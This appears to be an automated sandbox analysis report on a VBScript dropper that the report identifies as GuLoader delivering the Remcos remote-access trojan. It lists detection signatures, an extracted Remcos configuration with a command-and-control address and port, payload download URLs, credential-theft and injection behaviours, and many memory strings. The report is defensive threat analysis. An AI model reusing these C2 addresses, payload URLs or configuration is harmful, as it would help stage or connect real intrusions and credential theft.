Windows Analysis Report
MV STARSHIP AQUILA_pdf.vbs

Overview

General Information

Sample name: MV STARSHIP AQUILA_pdf.vbs
Analysis ID: 1530551
MD5: 427c143dcebde77d0881da0589b0392f
SHA1: 732631d0993cb724e8e93dd146e871026e5a4874
SHA256: fd352ed76e51602f74cdf8305a6da9386d70909e91f72fbce124afe3a911322a
Tags: RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Powershell creates an autostart link
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection

barindex
Source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "154.216.18.214:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-AOD6MB", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: equip4.shop Virustotal: Detection: 5% Perma Link
Source: Yara match File source: 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability
Source: Binary string: CallSite.Targetore.pdbh source: powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb0 source: powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2045907923.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 8_2_1FC710F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW, 10_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 12_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407898

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 154.216.18.214:2404
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 154.216.18.214:2404
Source: Malware configuration extractor URLs: 154.216.18.214
Source: global traffic TCP traffic: 192.168.2.4:49738 -> 154.216.18.214:2404
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 178.237.33.50:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 104.21.56.207:80
Source: global traffic HTTP traffic detected: GET /FvMVdpFg/Atols.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: equip4.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /OaDlaEkr/ZMtPPuAqIIoCDAp111.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: equip4.shopCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: global traffic HTTP traffic detected: GET /FvMVdpFg/Atols.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: equip4.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /OaDlaEkr/ZMtPPuAqIIoCDAp111.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: equip4.shopCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: msiexec.exe, 00000008.00000002.3028207567.000000001FC40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000A.00000003.2193037694.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194835668.00000000008EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000A.00000003.2193037694.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194835668.00000000008EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: bhv9E46.tmp.10.dr String found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv9E46.tmp.10.dr String found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: msiexec.exe, 00000008.00000002.3028615098.00000000200B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000008.00000002.3028615098.00000000200B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: equip4.shop
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: powershell.exe, 00000003.00000002.2045907923.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000001.00000002.1876984080.00000112E45A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoftBp
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: powershell.exe, 00000001.00000002.1877272550.00000112E6117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1877272550.00000112E7B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1877272550.00000112E77F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://equip4.shop
Source: powershell.exe, 00000001.00000002.1877272550.00000112E6117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://equip4.shop/FvMVdpFg/Atols.rarP
Source: powershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://equip4.shop/FvMVdpFg/Atols.rarXR1l
Source: msiexec.exe, 00000008.00000002.3027613300.000000001F470000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.bin
Source: msiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.bin$
Source: msiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.binL
Source: msiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2164797616.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000008.00000003.2153435021.0000000000698000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2153308251.0000000000697000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2166795122.0000000000688000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2163785144.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2166598432.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2165888413.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2162793689.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2164797616.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpO
Source: msiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpjb5W7
Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl
Source: msiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl0b
Source: powershell.exe, 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://ocspx.digicert.com0E
Source: powershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1877272550.00000112E5EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2027928945.0000000004611000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2170309707.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2170273131.00000000007BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 00000008.00000002.3028207567.000000001FC40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 00000008.00000002.3028207567.000000001FC40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 0000000D.00000003.2170309707.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2170273131.00000000007BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comta
Source: bhv9E46.tmp.10.dr String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: msiexec.exe, 0000000A.00000002.2193776072.00000000000F3000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000001.00000002.1877272550.00000112E5EF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2027928945.0000000004611000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBdq
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhv9E46.tmp.10.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
